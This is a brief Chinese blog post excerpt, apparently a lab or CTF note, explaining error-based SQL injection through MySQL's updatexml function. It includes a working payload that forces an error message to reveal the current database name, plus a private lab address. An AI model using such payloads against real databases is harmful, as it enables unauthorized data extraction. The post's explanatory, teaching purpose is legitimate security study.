摘要: updatexml函数 select updatexml(1,concat(0x7e,(select database()),0x7e),1) 利用语法报错,在中间要替换的信息里输入错误的语法字符,这样报错的时候就会把错误语法字符包含的信息以报错的形式报出 http://10.1.2.5:10631 阅读全文
posted @ 2018-04-19 19:26 Blizzard-wow 阅读(116) 评论(0) 推荐(0) 编辑